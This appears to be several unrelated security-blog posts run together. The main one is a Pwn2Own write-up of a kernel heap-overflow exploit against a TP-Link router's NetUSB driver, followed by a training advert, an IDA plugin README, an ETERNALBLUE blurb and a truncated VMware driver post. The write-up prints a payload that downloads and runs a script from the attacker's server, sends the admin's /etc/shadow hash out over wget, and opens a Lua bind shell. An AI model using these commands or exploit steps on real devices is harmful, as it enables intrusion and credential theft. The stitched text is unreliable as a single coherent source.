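The driver would read flags one pointer-width past where the kernel actually stored it, which is exactly the kind of silent mismatch that produces "random" crashes.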

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and look at the code / structures involved to see if a kernel configuration option would impact the layout of a relevant structure. From there, I could compare the kernel configuration of my bootable QEMU image with the kernel I had built from the GPL archive and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile and hope that it didn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
~# [   92.308000] INFO1572: Bind to eth0

For readers who would like to do the same, here are some technical details they might find useful (I have probably forgotten most of the others):

  • I used debootstrap to easily install older Linux distributions until I found one that worked with the package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution both to build the GPL code from TP-Link and to cross-compile the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract them on a regular Ubuntu Intel x64 VM, chroot into those folders and SHOULD be able to reproduce what I described. Or at least get very close to reproducing it.
  • I cross-compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz, where it is downloaded / compiled from the GPL code, or you can grab the binaries directly from wheezy-compile-kernel.tar.xz.
  • You can find the command line I used to start QEMU in start_qemu.sh, and the one to attach GDB to the kernel in dbg.sh.

Enters Zenith

Once I was able to attach GDB to the kernel, I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had made to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I ever got there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it lacked a bunch of more recent mitigations, which gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Do read the article; it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages from the kernel, and as a result we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes), which would force blocks from the higher orders to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000, which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could now be used by a kmalloc-1024 slab. I struggled, tried a lot of things and never managed to pull it off. I remember the bug had a few annoying properties I hadn't realized when I found it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.
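The draining idea can be illustrated with a toy buddy allocator. This is a simplified model written for illustration (ToyBuddy is hypothetical: no coalescing on free, no zones or migrate types), but it splits blocks the way the kernel's expand() does, keeping the lower half and putting the upper half on the next-lower free list. Once the order-0 list is empty, two consecutive order-0 allocations come from the same split order-1 block and are therefore adjacent.

```python
PAGE_SIZE = 0x1000

class ToyBuddy:
    """Toy binary buddy allocator: free_lists[order] holds start addresses
    of free blocks of 2**order pages (no coalescing in this sketch)."""

    def __init__(self, max_order: int):
        self.free_lists = [[] for _ in range(max_order + 1)]

    def free(self, addr: int, order: int) -> None:
        self.free_lists[order].append(addr)

    def alloc(self, order: int) -> int:
        # Take a block from the smallest non-empty free list at or above `order`.
        for current in range(order, len(self.free_lists)):
            if self.free_lists[current]:
                addr = self.free_lists[current].pop()
                break
        else:
            raise MemoryError("no block large enough")
        # Split it down: keep the lower half, free the upper half (its buddy).
        while current > order:
            current -= 1
            self.free_lists[current].append(addr + (PAGE_SIZE << current))
        return addr

heap = ToyBuddy(max_order=1)
heap.free(0x10000, 0)      # one free order-0 page
heap.free(0x20000, 1)      # one free order-1 block (two pages)

heap.alloc(0)              # drains the order-0 free list
victim = heap.alloc(0)     # forces the order-1 block to split
neighbour = heap.alloc(0)  # takes the buddy half
print(hex(victim), hex(neighbour))  # 0x20000 0x21000
```

In the scenario above, victim would be the overflowable page and neighbour a page that a kmalloc-1024 slab might later claim; whether that happens on a real system depends on everything else allocating at the same time.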

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
      if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
        ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);    // attacker controlled
        AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);   // overflow; 208 == 0xD0 (GFP_KERNEL on kernels of this era)
        if (!AllocatedBuffer) {
          return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
        }
        // ...
        if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))
        // ...
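This second bug boils down to computing ReceivedSize + 17 in 32 bits before allocating, then reading ReceivedSize bytes. Here is a hedged Python sketch of that arithmetic next to a hypothetical checked variant that rejects lengths whose addition would wrap. It illustrates the missing check; it is not a vendor patch, and a real fix would likely also cap the length at something sane.

```python
from typing import Optional

U32_MAX = 0xFFFFFFFF
HEADER = 17  # bytes added to the attacker-supplied length before _kmalloc

def kmalloc_size_unchecked(received_size: int) -> int:
    """What the driver computes: a 32-bit addition that silently wraps."""
    return (received_size + HEADER) & U32_MAX

def kmalloc_size_checked(received_size: int) -> Optional[int]:
    """Same computation, but refuse any length for which the addition would wrap."""
    if received_size > U32_MAX - HEADER:
        return None
    return received_size + HEADER

for n in (0x40, 0xFFFFFFEF, 0xFFFFFFFF):
    print(hex(n), kmalloc_size_unchecked(n), kmalloc_size_checked(n))
# 0x40 81 81
# 0xffffffef 0 None
# 0xffffffff 16 None
```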

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error, I started to notice that if I took a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close to my buffer. To this day, I haven't fully debugged where exactly it came from, but as this was my only lead I went along with it.

The target kernel has neither ASLR nor NX, so my exploit can hardcode addresses and execute code from the heap directly, which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a large 3MB allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation, as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overwrites the head.next list pointer of an adjacent wait_queue_head_t, allocated by the socket stack of the Linux kernel, with the address of a crafted wait_queue_entry_t under my control (the Trasher class in the exploit code). These are the definitions of the structures:

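// Naming from newer kernels. On the older (pre-4.13) kernel used here the same layouts are
// struct __wait_queue_head / struct __wait_queue (wait_queue_head_t / wait_queue_t),
// and both list_head members are called task_list, as in the code and GDB output below.
struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};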

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}
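One detail worth spelling out: list_for_each_entry_safe does not follow pointers to wait_queue_t objects directly. Each list pointer targets the embedded task_list member, and the macro subtracts that member's offset (container_of) to find the entry before reading func. The sketch below lays out a fake entry as the older struct __wait_queue would appear on 32-bit big-endian MIPS (flags, private, func, then task_list.next/prev, 4 bytes each) and computes which value the corrupted head pointer must hold. The helper names and addresses are hypothetical; this is not the exploit's Trasher class.

```python
import struct

# Member offsets of struct __wait_queue (wait_queue_t) with 4-byte fields on 32-bit MIPS.
OFF_FLAGS, OFF_PRIVATE, OFF_FUNC, OFF_TASK_LIST = 0, 4, 8, 12

def fake_wait_queue_entry(entry_addr: int, func: int, head_list_addr: int) -> tuple[bytes, int]:
    """Build a fake entry stored at `entry_addr`. Returns its bytes and the
    value to write into the corrupted head's task_list.next."""
    blob = struct.pack(
        ">IIIII",
        0,               # flags: WQ_FLAG_EXCLUSIVE clear
        0,               # private
        func,            # called as curr->func(curr, mode, wake_flags, key)
        head_list_addr,  # task_list.next: back to the head, so the walk stops after us
        head_list_addr,  # task_list.prev
    )
    return blob, entry_addr + OFF_TASK_LIST

def func_seen_by_kernel(memory: bytes, memory_base: int, list_ptr: int) -> int:
    """container_of(list_ptr, wait_queue_t, task_list)->func, read from `memory`."""
    entry_addr = list_ptr - OFF_TASK_LIST
    (func,) = struct.unpack_from(">I", memory, entry_addr - memory_base + OFF_FUNC)
    return func

payload_base = 0x83C00010   # hypothetical staging address for the fake entry
shellcode = 0x83C00100      # hypothetical address of the kernel payload
blob, head_next = fake_wait_queue_entry(payload_base, shellcode, head_list_addr=0x85173480)
print(hex(head_next), hex(func_seen_by_kernel(blob, payload_base, head_next)))
# 0x83c0001c 0x83c00100
```

Pointing head.next at the start of the fake entry instead of at its task_list member would make the kernel read func from 12 bytes too early.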

This is what it looks like in GDB once q->task_list.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0
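call_usermodehelper-style APIs take argv and envp as NULL-terminated arrays of string pointers. In the data above, the single .word 0 labelled envp does double duty: it sits right after argv[2], so it terminates argv, and it is also an empty envp. A hedged Python sketch that lays out the same kind of blob for a given load address, assuming 4-byte big-endian pointers and a 4-byte-aligned pointer array; build_arg_blob and the addresses are hypothetical, not part of the exploit.

```python
import struct

def build_arg_blob(base: int, args: list[str]) -> tuple[bytes, int, int]:
    """Lay out NUL-terminated strings, then a pointer array whose final NULL
    entry doubles as an empty envp. Returns (blob, argv_addr, envp_addr)."""
    blob = bytearray()
    string_addrs = []
    for arg in args:                      # like the .asciiz directives
        string_addrs.append(base + len(blob))
        blob += arg.encode() + b"\x00"
    blob += b"\x00" * (-len(blob) % 4)    # align the pointer array to 4 bytes
    argv_addr = base + len(blob)
    for addr in string_addrs:             # argv: .word arg0 / arg1 / arg2
        blob += struct.pack(">I", addr)
    envp_addr = base + len(blob)
    blob += struct.pack(">I", 0)          # envp: .word 0 (also argv's terminator)
    return bytes(blob), argv_addr, envp_addr

blob, argv_addr, envp_addr = build_arg_blob(0x83C00200, ["/bin/sh", "-c", "id"])
print(hex(argv_addr), hex(envp_addr), len(blob))  # 0x83c00210 0x83c0021c 32
```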

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier, as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf. the Leaker class).

OK, at that point it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability-wise, it worked well enough in the QEMU environment: about 3 times out of 5, I would say. Good enough.

I started to port the exploit over to the real device and, to my surprise, it worked there as well. The reliability was poorer, but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel, I was left with dmesg output to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable, but hey, I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would run our exploits in the environment they had set up.

At that point we had two exploits, and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link had pushed an update for the router 😳. I thought: damn. I was at work when I saw the news and was stressed about the bug getting killed, or worried that the update could have changed something my exploit relied on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading, but they didn't have any hints suggesting that NetUSB or the kernel had been updated, which was... good. I extracted the files from the firmware image with binwalk and quickly checked NetUSB.ko. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time came to demonstrate my exploit, it unfortunately didn't land in the three attempts, which was a bit frustrating. Still, I knew from the beginning that my odds entering the contest weren't the best. I remembered that I originally didn't even think I'd be able to compete, so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug and to set up an environment for. I probably would not go that route if I were doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
  • Ghidra's decompiler handles MIPS32 code pretty well. It wasn't perfect, but it was a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money, but maybe it would be good for me to do a better job at looking at more than one target instead of diving deep into one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hang out with us on Diary of reverse-engineering's Discord server!

Announcing Self-Paced Trainings!

Self-paced trainings are arriving for all existing public trainings, this includes:

  • Vulnerability Research & Fuzzing

  • Reverse Engineering

  • Offensive Tool Development

  • Misc workshops

This change comes from both interest from previous students & my own preference to learn via pre-recorded content.

Features of self-paced trainings include:

  • Pre-recorded content that matches the 4-day live training versions

    • Includes all the materials you’d normally get in the 4-day live version

    • Includes a free seat on the next 4-day live version (pending seat availability)

  • Unlimited discussions via email/twitter/discord with instructor

  • Free and paid workshops / mini-trainings on various topics

    • I also take requests on workshops / mini-trainings / topics you’d like to see

Different platforms for hosting the self-paced versions have been considered; we’re currently experimenting with the Thinkific platform and are in the process of modifying and uploading all the recorded content. (I recently relocated from Australia to the USA, which has delayed the self-paced development a bit, but a lot of content is already uploaded.)

While the self-paced versions are being edited and uploaded, I’m offering access to it at a discounted rate (20% off!), this gets you:

  • Access to draft versions of the training content as they’re developed

  • Lifetime Access to the training once completed

Once a particular training has been finalized, the discount for it will no longer be offered.

You can find the draft self-paced training offerings (as they’re developed) here: https://signal-labs.thinkific.com/collections

(Link will be updated when training is finalized)


For any questions, feel free to contact us via email.

Happy Hacking!

VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries


The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where the Hex-Rays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (so as not to depend on the architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi, make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive, and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires an exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary, you need to set the compiler options first (Options > Compiler). After that, VulFi will do its best to filter all obvious false positives (such as a call to printf with a constant string as the first parameter). Please note that while the plugin is made without any ties to a specific architecture, some processors do not have full support for specifying types, and in such cases VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.
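The matching rule described above (case-insensitive, but otherwise exact) can be illustrated with a tiny hypothetical helper. It mirrors the documented behaviour only and is not VulFi's code.

```python
def is_tracked(name: str, tracked: list[str]) -> bool:
    """Case-insensitive exact match against the tracked function names."""
    wanted = {t.lower() for t in tracked}
    return name.lower() in wanted

tracked = ["memcpy", "strcpy"]
for name in ("MEMCPY", "Memcpy", "memcpy", "std_memcpy", "memcpy_0"):
    print(name, is_tracked(name, tracked))
```

Under this behaviour, renamed variants have to be listed explicitly, which is presumably why rules can carry several alt_names for the same function.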

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or the previous results are loaded, a table will be presented with a view containing the following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

If there are no data inside the idb/i64 file, or the user decides to perform a new scan, the plugin will ask whether it should run the scan using the default included rules or a custom rules file. Please note that running a new scan when results already exist does not overwrite the items previously found by a rule with the same name. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect a detected instance of a possibly vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location that was identified as potentially interesting. Right-clicking and selecting the Set Vulfi Comment option allows you to enter a comment for the given instance (to justify the status, for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file containing multiple rules. To create a custom rule file with the structure below, you can use the included template file.

[   // An array of rules
    {
        "name": "RULE NAME", // The name of the rule
        "alt_names":[
            "function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
        ],
        "wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
        "mark_if":{
            "High":"True", // If evaluates to True, mark with priority High (see Rules below)
            "Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
            "Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
        }
    }
]

An example rule that looks for all cross-references to the function malloc and checks whether its parameter is not constant and whether the return value of the function is checked is shown below:

{
    "name": "Possible Null Pointer Dereference",
    "alt_names":[
        "malloc",
        "_malloc",
        ".malloc"
    ],
    "wrappers":false,
    "mark_if":{
        "High":"not param[0].is_constant() and not function_call.return_value_checked()",
        "Medium":"False",
        "Low": "False"
    }
}
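To make this rule concrete, here is a minimal C sketch of the two kinds of call sites it is meant to tell apart, assuming the rule behaves as its expression reads: a malloc whose size argument is not a constant and whose return value is never compared is marked High, while a call whose result is checked is not. The helper name copy_checked is hypothetical, and the flagged pattern is kept in a comment so the block itself stays correct.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Pattern the rule would mark High: param[0] (len + 1) is not a constant
 * and the return value of malloc is used without being compared.
 *
 *     char *p = malloc(len + 1);
 *     memcpy(p, src, len);          // NULL dereference if malloc failed
 */

/* Pattern the rule should leave unmarked: the NULL comparison below is the
 * kind of check function_call.return_value_checked() is meant to detect. */
char *copy_checked(const char *src, size_t len)
{
    assert(src != NULL);
    char *p = malloc(len + 1);       /* non-constant size, as in the rule */
    if (p == NULL)
        return NULL;
    memcpy(p, src, len);
    p[len] = '\0';
    return p;
}
```

Because param[0] is `len + 1`, the is_constant() half of the condition is true for both variants; only the presence of the return-value check separates them.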

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request a parameter with an out-of-bounds index, every call to the function will be marked as Low priority. This avoids missing cross-references where it was not possible to correctly recover all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view, switch context away from the view and then come back, the view will not load. You can solve this by terminating the search before switching context, by moving the VulFi view to the side view so that it is always visible, or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

The whitepaper for the research on ETERNALBLUE done by @JennaMagius and me has been completed.

Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.


Errata

r5hjrtgher pointed out that the vulnerable code section did not appear accurate. Upon further investigation, we found the observation was correct. The confusion arose because, unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing down the exact location was not necessary to port the exploit.

Here is the correct vulnerable code path for Windows 10 version 1511:

How the vulnerability was patched with MS17-010:

The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.

Minor note: there was also extra assembly and mitigations added in the code paths leading to this.
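Why a 16-bit operation on a 32-bit size is dangerous can be shown with a small C sketch. It assumes the shape commonly described in public analyses of this bug: SrvOs2FeaListSizeToNt shrinks a 32-bit FEA list size down to the length of the valid entries, but only the low 16 bits are written. The function names and values are hypothetical and chosen for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Buggy shape: only the low 16 bits of the 32-bit size are replaced,
 * so whatever was in the high 16 bits survives the "shrink". */
uint32_t shrink_size_16(uint32_t old_size, uint32_t valid_size)
{
    assert(valid_size <= old_size);
    return (old_size & 0xFFFF0000u) | (valid_size & 0xFFFFu);
}

/* Patched shape: the full 32-bit value is written. */
uint32_t shrink_size_32(uint32_t old_size, uint32_t valid_size)
{
    assert(valid_size <= old_size);
    return valid_size;
}
```

With an original size of 0x10000 and 0xFF5D bytes of valid data, the 16-bit version yields 0x1FF5D, larger than the buffer it is supposed to describe, which is the kind of miscalculation that leads to the overflow; the 32-bit version yields 0xFF5D. Below 0x10000 both versions agree, which is why the bug needs an oversized list to trigger.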

To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

Finding a Kernel 0-day in VMware vCenter Converter via Static Reverse Engineering

I posted a poll on Twitter (“Next blog topic?”) to decide what this blog post would be about, and the results indicated it should be about kernel driver reversing.

I figured I’d make it a bit more exciting by finding a new kernel 0-day to integrate into the blog post, so I started thinking about which driver would be a fun target.
I’ve reversed VMware drivers before, primarily ones relating to their hypervisor, but I’ve also used their vCenter Converter tool and wondered what attack surface it introduces when installed.

It turns out it installs a kernel component (vstor2-x64.sys) that low-privileged users can interact with. Using Sysinternals’ WinObj.exe tool, we can see this driver installed under the name “vstor2-mntapi20-shared” in the “Driver” directory.

To confirm low-privileged users can interact with this driver, we take a look at the “Device” directory.
Drivers have various ways of communicating with user-land code. One common method is for the driver to expose a device that user-land code can open a handle to (using the CreateFile APIs). We find the device with the same name, double-click it and view its security attributes:

